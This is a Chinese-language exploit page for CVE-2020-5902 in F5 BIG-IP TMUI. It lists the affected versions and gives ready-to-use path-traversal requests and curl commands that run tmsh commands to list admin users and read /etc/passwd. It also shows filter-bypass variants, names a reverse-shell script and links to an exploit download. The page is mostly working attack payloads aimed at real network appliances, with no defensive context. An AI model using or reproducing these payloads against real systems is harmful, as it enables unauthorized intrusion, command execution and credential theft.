## CVE-2020-5902 F5 BIG-IP TMUI 远程代码执行漏洞
影响版本:
– BIG-IP 15.x: 15.1.0/15.0.0
– BIG-IP 14.x: 14.1.0 ~ 14.1.2
– BIG-IP 13.x: 13.1.0 ~ 13.1.3
– BIG-IP 12.x: 12.1.0 ~ 12.1.5
– BIG-IP 11.x: 11.6.1 ~ 11.6.5
poc:
“`
GET /tmui/login.jsp/..;/tmui/system/user/authproperties.jsp
GET /tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=AnyMsgHereWillBeReflectedInTheResponse
“`
rce exp:
“`
RCE:
curl -v -k ‘https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin’
GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
“`
Read File exp:
“`
curl -v -k ‘https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd’
GET /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
“`
Bypass:
“`
..; ==> /hsqldb;
..; ==> /hsqldb%0a
“`
reverse shell:
“`
./CVE-2020-5902.sh
“`
[@Budi Khoirudin](https://twitter.com/x4ce/status/1279790599793545216?s=21)
[@jas502n](https://github.com/jas502n/CVE-2020-5902)
[@TeamARES team](https://github.com/Critical-Start/Team-Ares/tree/master/CVE-2020-5902)
[点我下载 CVE-2020-5902 F5 BIG-IP TMUI 远程代码执行漏洞.zip](/Gr33kLibrary/download_tool/106/)
请登录后查看评论内容